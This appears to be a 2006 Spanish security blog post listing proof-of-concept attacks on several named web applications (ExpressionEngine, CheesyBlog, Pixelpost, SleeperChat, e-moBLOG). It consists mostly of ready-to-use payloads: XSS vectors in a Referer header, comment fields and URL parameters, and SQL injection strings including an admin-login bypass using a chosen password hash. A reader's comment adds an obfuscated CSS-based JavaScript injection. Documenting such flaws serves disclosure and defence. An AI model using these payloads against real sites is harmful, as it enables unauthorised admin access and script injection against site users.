ecoestadistica.com

martes, enero 24, 2006

Vulnerabilidades...

ExpressionEngine 'Referer' XSS

Ejemplo de HTTP Query:

GET /path/index.php HTTP/1.0
Host: host
Referer: http:///XSS>.com/;

--------------------------------------------------------------
CheesyBlog XSS Vulnerability

Ejemplo de XSS:

http://host/cheesyblog/archive.php? entry=1

Agregue a comment

Your name: XSS
Your email address: cualquiera
Website URL: javascript:[code]
Comment: XSS

--------------------------------------------------------------

Pixelpost Photoblog XSS Vulnerability

http://host/pixelpost/index.php?popup=comment&showimage=1

Agregue a Comment: XSS

--------------------------------------------------------------

SleeperChat Input Validation Hole Permits Cross-Site Scripting Attacks

http://www.sitevuln.com/chat/index.php?pseudo=%3E%3Cscript%3Ealert(navigator.appVersion)%3C/script%3E&
txtlen=500&smiley=1

--------------------------------------------------------------

e-moBLOG Input Validation Bugs Permit SQL Injection Attacks

1. SQL Injection Ejemplo:

http://host/emoblog/index.php?monthy=2006017'%20union%20select%201,2,3,4,5,6,7,8,9,10/*#1

2. SQL Injection Ejemplo:

link: http://host/emoblog/admin/index.php
username: aaa' union select 'bbb','[md5-hash de cualquier password]'/*
password: [cualquiera]

Salu2

1 Comments:

Anonymous Anónimo said...

anytag
style="background:url("javascri\Dpt:/*/**/(function a()
{alert('JavaScript es ejecutado.')})();");"
/

enero 25, 2006 1:04 p. m.  

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com